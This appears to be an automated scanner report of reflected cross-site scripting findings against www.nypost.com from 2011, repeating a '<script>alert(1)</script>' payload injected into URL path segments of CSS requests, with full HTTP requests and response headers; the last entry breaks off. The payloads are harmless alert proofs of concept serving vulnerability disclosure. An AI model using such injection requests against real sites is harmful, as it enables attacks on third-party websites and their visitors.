The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac4e7<script>alert(1)</script>620b5623769 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigac4e7<script>alert(1)</script>620b5623769/WebPortal/nypost/blocks/post_video/post_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:21 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c024<script>alert(1)</script>7c29b147721 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal8c024<script>alert(1)</script>7c29b147721/nypost/blocks/post_video/post_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:23 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d427<script>alert(1)</script>673f54c1be1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost4d427<script>alert(1)</script>673f54c1be1/blocks/post_video/post_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:25 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dd05b<script>alert(1)</script>6ef30eeb179 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksdd05b<script>alert(1)</script>6ef30eeb179/post_video/post_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:26 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 997c8<script>alert(1)</script>1fab4d8a2fc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/post_video997c8<script>alert(1)</script>1fab4d8a2fc/post_video.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:29 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 64d0f<script>alert(1)</script>659f5696f28 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/post_video/post_video.css64d0f<script>alert(1)</script>659f5696f28 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 725 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:30 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf1df<script>alert(1)</script>5acd17d40a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigcf1df<script>alert(1)</script>5acd17d40a9/WebPortal/nypost/blocks/search/search.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:08 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83f39<script>alert(1)</script>cb4fcf8098 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal83f39<script>alert(1)</script>cb4fcf8098/nypost/blocks/search/search.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52688<script>alert(1)</script>9498de8da06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost52688<script>alert(1)</script>9498de8da06/blocks/search/search.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:12 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aacdb<script>alert(1)</script>7f534f15914 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksaacdb<script>alert(1)</script>7f534f15914/search/search.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:16 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8f1af<script>alert(1)</script>2917460467d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/search8f1af<script>alert(1)</script>2917460467d/search.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:17 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3f7d1<script>alert(1)</script>b14a41f6761 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/search/search.css3f7d1<script>alert(1)</script>b14a41f6761 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:20 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d6465<script>alert(1)</script>fb99723ff6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigd6465<script>alert(1)</script>fb99723ff6d/WebPortal/nypost/blocks/section_blocks/section_blocks.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:34 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c8cdd<script>alert(1)</script>0798cccf20c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortalc8cdd<script>alert(1)</script>0798cccf20c/nypost/blocks/section_blocks/section_blocks.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:36 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6b141<script>alert(1)</script>e36e8af94b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost6b141<script>alert(1)</script>e36e8af94b0/blocks/section_blocks/section_blocks.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:38 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a26b2<script>alert(1)</script>17224f47620 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksa26b2<script>alert(1)</script>17224f47620/section_blocks/section_blocks.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:39 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b0fdd<script>alert(1)</script>789b66baff3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/section_blocksb0fdd<script>alert(1)</script>789b66baff3/section_blocks.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:41 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d95d8<script>alert(1)</script>f4b367da8cf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.cssd95d8<script>alert(1)</script>f4b367da8cf HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 733 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:43 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aae1f<script>alert(1)</script>786b9845610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfigaae1f<script>alert(1)</script>786b9845610/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:00 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e862<script>alert(1)</script>7eb9fd2f95b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal4e862<script>alert(1)</script>7eb9fd2f95b/nypost/blocks/sticky_notes/sticky_notes.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:03 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f24a<script>alert(1)</script>e275c84e434 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost8f24a<script>alert(1)</script>e275c84e434/blocks/sticky_notes/sticky_notes.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:04 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59d1b<script>alert(1)</script>27edeb9cd02 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks59d1b<script>alert(1)</script>27edeb9cd02/sticky_notes/sticky_notes.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:07 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c24a5<script>alert(1)</script>54ee03b1f0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notesc24a5<script>alert(1)</script>54ee03b1f0/sticky_notes.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 728 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:10 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 64bc3<script>alert(1)</script>6c9fbe3316d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/sticky_notes/sticky_notes.css64bc3<script>alert(1)</script>6c9fbe3316d HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 729 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:14 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36be6<script>alert(1)</script>c1bfb51766b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig36be6<script>alert(1)</script>c1bfb51766b/WebPortal/nypost/blocks/story_lists/story_lists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:28 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8352<script>alert(1)</script>5bc81b9bd20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortald8352<script>alert(1)</script>5bc81b9bd20/nypost/blocks/story_lists/story_lists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:30 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e9bf<script>alert(1)</script>d6a4a30d1e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost2e9bf<script>alert(1)</script>d6a4a30d1e3/blocks/story_lists/story_lists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:32 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d6ece<script>alert(1)</script>9658352bd9c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocksd6ece<script>alert(1)</script>9658352bd9c/story_lists/story_lists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:35 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 16cf3<script>alert(1)</script>e7fb60b6fe1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Resource/SysConfig/WebPortal/nypost/blocks/story_lists16cf3<script>alert(1)</script>e7fb60b6fe1/story_lists.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 727 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:40:37 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 13595<script>alert(1)</script>a60d047bf8f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
